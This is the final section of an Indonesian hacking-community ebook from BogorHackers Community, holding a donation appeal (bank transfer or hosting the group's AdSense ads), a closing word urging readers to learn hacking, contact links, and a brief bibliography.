Selayaknya sebuah forum pasti membutuhkan sebuah domain, hosting, dan keperluan lainnya. Maka dari itu BogorHackers Community membuka donasi bagi teman-teman yang berminat dengan secara sukarela untuk kemajuan forum BogorHackers Community. Untuk saat ini ada dua metode untuk donasi, yaitu dengan mengirim donasi melalui rekening bank dan berpartisipasi dalam memasang iklan bagi teman-teman yang mempunyai blog atau website untuk BHC.
1. Donasi Melalui Rekening Cara donasi disini cukup mudah hanya dengan mentransfer sejumlah saldo ke rekening yang digunakan, disini jumlah saldo tidak ditetapkan terserah kepada teman-teman, karena ini bersifat sukarela dan tidak ada unsurpemaksaaan. Jika ada yang berminat untuk donasi melalui rekening bisa PM Tomi di YM tomi.riddles, atau di Facebook tomi.riddle https://www.facebook.com/tomi.riddle
2. Donasi Melalui Iklan BHC Cara yang satu ini mungkin lebih mudah dan tidak menggunakan materi, karena metode ini cukup dengan memasang iklan BHC di website atau blog kesayangan teman-teman. Untuk yang mau berpartisipasi dan memasang iklan di website atau blognya, silahkan PM Tomi di YM tomi.riddles, atau di Facebook tomi.riddle https://www.facebook.com/tomi.riddle . kami hanya merekomendasikan 1 iklan saja yang untuk dipasang, sisanya terserah pada teman-teman. Silahkan PM denan format : Nama blog : Jenis Blog : Jumlah Iklan : Posisi Iklan : vertical / horizontal / horizontal sidebar (untuk ukuran dapat disesuaikan) Jenis Iklan : text / mini banner Disini kami menggunakan iklan dari Google Adsense, karena kami melihat kemudahan dalam melakukan transaksi. Dengan satu kali cash out dalam sebulan, mungkin itu cukup untuk membayar hosting, dan selebihnya akan dimasukkan kedalam kas dan dapat dilihat di http://bogorhacker.net/bhc-dashboard/508update-laporan-keuangan-bhc.html#post1076 . Dengan melakukan donasi, anda mendapatkan 100 point reputation dan title BHC Donatur[$], dan bagi yang melakukan dua metode mendapat permission custom title. Terimakasih untuk semua teman-teman atas partisipasinya.
Penutup Demikian yang dapat kami Sampaikan pada Ebook ini, tentu manusia penuh dengan banyak kekurangan dan kelemahan, karena keterbatasan kemampuan, oleh karena itu Kami berharap para Pembaca Ebook dan teman-teman BogorHackers Community dapat memberi kritik dan saran yang membangun kepada kami untuk memperbaiki di masa yang akan datang. Semoga Ebook ini dapat berguna bagi para pembaca dan teman-teman yang ingin 33 belajar tentang hacker dan lain-lain yang berkaitan dengan dunia underground, dan untuk membangkitkan semangat juang belajar dan pratik ( learning by doing). Kita semua pasti bisa jika bersungguh-sungguh dalam suatu ilmu pengetahuan dan perkerjaan, dan mengembangkat potensi dan bakat yang ada dalam diri kita dengan itu kita bebas berkarya dan mencurahkan segala ilmu pengetahuan dengan gratis. Maju terus hacker Indonesia, semoga kita bisa menguasai dunia, semoga kita mengalahkan teknologi yang lebih maju seperti Amerika Serikat. Semoga BogorHackers Community terus bertambah anggota dan member yang aktif!! Kami menerima kritik dan saran melalu email, facebook dan forum. Supaya kita berharap kedepannya lebih baik Email Forum Facebook
:
[email protected] : http://www.bogorhacker.net : https://www.facebook.com/groups/bhcrew/
DAFTAR PUSTAKA 34 http://www.google.co.id http://www.google.co.uk http://www.google.co.il http://www.bogorhacker.net dan masih banyak lagi maaf tidak di sebutkan satu per satu